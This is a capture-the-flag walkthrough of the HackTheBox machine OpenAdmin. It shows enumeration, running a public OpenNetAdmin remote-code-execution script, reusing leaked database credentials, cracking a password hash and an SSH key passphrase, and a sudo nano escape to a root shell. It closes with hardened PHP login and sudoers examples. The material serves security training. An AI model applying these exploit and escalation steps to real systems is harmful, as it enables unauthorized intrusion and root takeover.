OpenAdmin from HackTheBox

OpenAdmin is an easy difficulty Linux machine that features an outdated OpenNetAdmin CMS instance. The CMS is exploited to gain a foothold, and subsequent enumeration reveals database credentials. These credentials are reused to move laterally to a low privileged user. This user is found to have access to a restricted internal application. Examination of this application reveals credentials that are used to move laterally to a second user. A sudo misconfiguration is then exploited to gain a root shell.

Nmap scan

We start by checking the running services:

nmap -sV -sC 10.10.10.171 -v
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have SSH and HTTP open.

http://10.10.10.171 just returns the default Apache web page.

Web enumeration

To find sub-directories, I like to use gobuster:

gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirb/common.txt
/artwork (Status: 301)
/index.html (Status: 200)
/music (Status: 301)
/server-status (Status: 403)

After checking the login page at http://10.10.10.171/music, I found an interesting service version.

The version shown is v18.1.1.

By checking the page source:

<head>
    <title>OpenNetAdmin :: 0wn Your Network</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="stylesheet" type="text/css" href="/ona/include/html_style_sheet.inc.php">
    <link rel="shortcut icon" type="image/ico" href="/ona/images/favicon.ico">
    <script type="text/javascript" src="/ona/include/js/global.js" language="javascript"></script>
    <script type="text/javascript" src="/ona/include/xajax_drag/drag.js"></script>
    <script type="text/javascript" src="/ona/include/xajax_suggest/suggest.js"></script>

The title is OpenNetAdmin. We can use searchsploit to look for an exploit matching this version:

searchsploit opennetadmin
OpenNetAdmin 13.03.01 - Remote Code Execution                | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution

We have an RCE!

First shell

We can grab the exploit:

searchsploit -m exploits/php/webapps/47691.sh && chmod +x 47691.sh

Then we run it against the vulnerable endpoint:

./47691.sh http://10.10.10.171/ona/login.php

We have a first shell!

Finding ssh creds

After spending some time searching for a clue, I decided to look at the web root directory /var/www/html/ona/local/config/ and found an interesting PHP file called database_settings.inc.php, which contains the password n1nj4W4rri0R!

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

Now we need a valid user. On Linux, we can find the usernames in /home or by checking /etc/passwd:

$ ls /home
jimmy
joanna

I tried to SSH in as both users, and the password worked for the jimmy user!

Owning User

By checking the listening services with netstat -antp, we can see a few services bound to localhost only.

To reach them, we have to set up port forwarding; the easiest way here is an SSH local forward:

ssh -L 52846:localhost:52846 jimmy@10.10.10.171

First, I tried curl http://127.0.0.1:52846 and it looked like a login page. We can open it in the browser to see the actual page.

At this point, we can look for the DocumentRoot of this page; maybe we can find login creds in its files.
To do so, we need to check the Apache config files:

ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16  2019 default-ssl.conf
-rw-r--r-- 1 root root  303 Nov 23 17:13 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 14:24 openadmin.conf

The openadmin.conf is for the default Apache web root, but internal.conf has:

Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

The index.php in the /var/www/internal dir has a password:

if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {

Looking up this hash on CrackStation (https://crackstation.net/) reveals the password: Revealed.
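
The check in index.php above is weak in two independent ways: the stored value is an unsalted, fast SHA-512 of the raw password (which is exactly why a lookup table recovered it in seconds), and the loose == comparison is neither constant-time nor type-safe in PHP. As an added example, not code from the box, the block below mirrors that check and places the hardened form beside it using PHP's built-in password_hash()/password_verify(); the function names and the $credentials map are my own assumptions.

```php
<?php
// Added example, not the box's /var/www/internal/index.php.

// Hash hard-coded in the box's index.php: an unsalted SHA-512 of the
// raw password, which CrackStation resolved to "Revealed" by lookup.
const JIMMY_SHA512 = '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1';

// Weak form, mirroring the check on the box. Problems: no salt (lookup
// tables work), fast hash (brute force is cheap), loose == (PHP compares
// numeric-looking strings such as "0e123..." numerically, and the
// comparison is not constant-time; at minimum use === or hash_equals()).
function weakLogin(string $user, string $pass): bool
{
    return $user == 'jimmy' && hash('sha512', $pass) == JIMMY_SHA512;
}

// Hardened form. password_hash() generates a random per-password salt and
// uses a deliberately slow algorithm (bcrypt by default, Argon2id where
// the build supports it); password_verify() compares in constant time.
// Store the result outside the web root (a database row, not PHP source).
function makeCredential(string $pass): string
{
    $algo = defined('PASSWORD_ARGON2ID') ? PASSWORD_ARGON2ID : PASSWORD_DEFAULT;
    return password_hash($pass, $algo);
}

// $credentials is a hypothetical username => hash map loaded from storage.
function safeLogin(string $user, string $pass, array $credentials): bool
{
    // Verify against a dummy hash when the user is unknown so that the
    // response time does not reveal which usernames exist.
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash('dummy', PASSWORD_DEFAULT);
    }
    $stored = $credentials[$user] ?? $dummy;
    $ok = password_verify($pass, $stored);
    return $ok && array_key_exists($user, $credentials);
}

// Constructed demo values, not from the box.
$credentials = ['jimmy' => makeCredential('Revealed')];
var_dump(weakLogin('jimmy', 'Revealed'));
var_dump(safeLogin('jimmy', 'Revealed', $credentials));
var_dump(safeLogin('jimmy', 'wrong', $credentials));
var_dump(safeLogin('nobody', 'Revealed', $credentials));
```
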
After logging in to the web app, a private id_rsa key is shown. It is passphrase-protected, so we can crack the passphrase with john: save the key in a file called id_rsa, then convert it to john format:

/opt/sshng2john.py id_rsa > to_crack
john to_crack -w=/usr/share/wordlists/rockyou.txt

The key passphrase is bloodninjas.
Now we can SSH in as joanna with this id_rsa and the cracked passphrase.

Owning root

The first thing to do is check whether we can run any commands as root without a password:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

We can run /bin/nano /opt/priv as any user, including root, without a password.
Gtfobins nano: https://gtfobins.github.io/gtfobins/nano/
Commands:

sudo -u root /bin/nano /opt/priv

Press Ctrl+R, then Ctrl+X, type reset; sh 1>&0 2>&0 and press Enter.
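
A sudoers rule that hands root an interactive editor cannot be contained, because nano (like vim, less and most editors and pagers) can spawn a child process. As an added example, not the box's own configuration, here is the rule as reported by sudo -l above beside the rule an administrator would write instead: sudoedit opens a temporary copy of the file as the invoking user and only the write-back into /opt/priv happens with root privileges.

```sudoers
# Weak rule, as found on the box (see the sudo -l output above):
# an interactive editor running as root can drop to a root shell.
joanna ALL=(ALL) NOPASSWD: /bin/nano /opt/priv

# Hardened alternative (added example, not the box's sudoers):
# sudoedit copies /opt/priv to a temp file, runs joanna's editor as
# joanna, then writes the edited copy back as root. The editor never
# holds root, so editor escapes gain nothing. Target user is narrowed
# from ALL to root, and the password prompt is kept.
joanna ALL=(root) sudoedit /opt/priv
```
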

Box owned! Your feedback is appreciated :)